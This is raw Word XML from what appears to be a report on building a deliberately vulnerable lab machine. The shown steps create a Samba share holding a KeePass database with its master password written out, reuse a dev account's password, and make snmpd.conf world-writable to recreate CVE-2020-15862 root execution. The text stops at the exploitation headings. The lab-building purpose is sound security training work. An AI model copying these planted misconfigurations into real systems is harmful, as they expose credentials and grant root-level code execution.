          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make a new folder and update the Samba SMB configuration to include our new share.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can set the SMB password of the dev account so the dev has some form of security when accessing SMB. The password is the same as the normal account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will then install ACL and set the read-write-execute permission of ACL to dev on /tmp/share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Following that, we'll proceed to install ACL and establish read-write-execute permissions for 'dev' on the '/tmp/share' directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Afterward, we'll update the firewall rules to permit Samba traffic and subsequently restart the smbd service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will populate the shared folder with a zipped Database.kdbx file. This Database.kdbx will be password locked with the Master password of ‘kalee1202007@yahoo.com’. It contains the SSH private key of the dev. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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34343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6z35lpum40fi" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onfigure SNMP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on CVE-2020-15862, Net-SNMP versions up to 5.7.3 can be exploited to run arbitrary code as root, or as the SNMP service account. It can also be used to escalate privileges to root. However, patches have been issued to fix this issue as of 2018, with the release of Net-SNMP version 5.8. Hence, we have to tweak the configuration steps to achieve the same result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="200"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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_62tmvrsarhvm">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.6. - Install and Configure SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> First, we install the following packages: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpd,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-mibs-downloader.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> After installing, run the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download-mibs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command with root privileges. This installs many different SNMP MIBs for different purposes. Without doing so, some of the commands for exploitation later may not run correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> After all of the MIBs are installed, we proceed to edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/snmp/snmpd.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. We configure the machine to listen on all ports for incoming SNMP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We create a read-write string to be able to read and write information through SNMP within the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/snmp/snmpd.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before SNMP version 5.8, CVE-2020-15862 states that the the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpset</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command with the “extend” functionality </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">could be used to write new scripts to be arbitrarily run by the SNMP service into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/snmp/snmpd.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">configuration file. However, this was patched with SNMP 5.8, with the write permissions on the SNMP Extends functionality removed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To manually replicate the now-patched vulnerability that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpset</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command once offered, we </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">introduce a permissions misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This will make the configuration file world readable and writable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hence, we can now begin the exploitation process as documented in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wyaatxh51719" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jp43irylji5s" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Flow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1525524"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="28" name="image39.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="801" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="15255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E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="434343"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="434343"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. Attack Flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lsohieuhdi0w" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
